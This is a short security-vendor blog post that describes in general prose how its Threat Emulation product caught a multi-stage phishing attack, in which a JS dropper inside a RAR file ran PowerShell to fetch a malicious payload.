Preventing Multi-Stage Attacks – Case in Point

By: Danielle Guetta, Product Marketing Manager & Amir Helinger, Product Manager

On our blog post from January of this year we shared how multi-stage attacks work and how our Threat Emulation technology is able to stop them. To that end, we would like to share a real life multi-stage attack that we blocked recently through our Threat Emulation.

To recap our first blog post, a multi-stage attack typically includes an initial dropper file, a main payload component of the malware, and additional modules delivered over a period of days, weeks, or more. Just like in the real-life instance we’re about to explain, the initial dropper is typically a benign file that is downloaded from the web or attached to an email, with the sole purpose of downloading another file from the Internet.

Figure 1: Generic multi-stage attack

Threat Emulation analyzes the dropper file actions by utilizing a secure open connection to the internet. It lets the dropper download the second file, execute it and detect it as malicious – thus preventing the attack.

And this is exactly how we blocked this real life multi-stage attack:

The initial dropper file was delivered in a phishing campaign, in the form of JS bundled in RAR. Once opened, the JS runs a PowerShell that downloads the payload component which is the malicious part of this multi-stage attack.



Figure 2: The multi-stage attack caught by ThreatCloud

By analyzing the dropper file action from the beginning and letting it download the second stage dropper file which is malicious, our Threat Emulation discovered the attack and prevented it before it breached the network.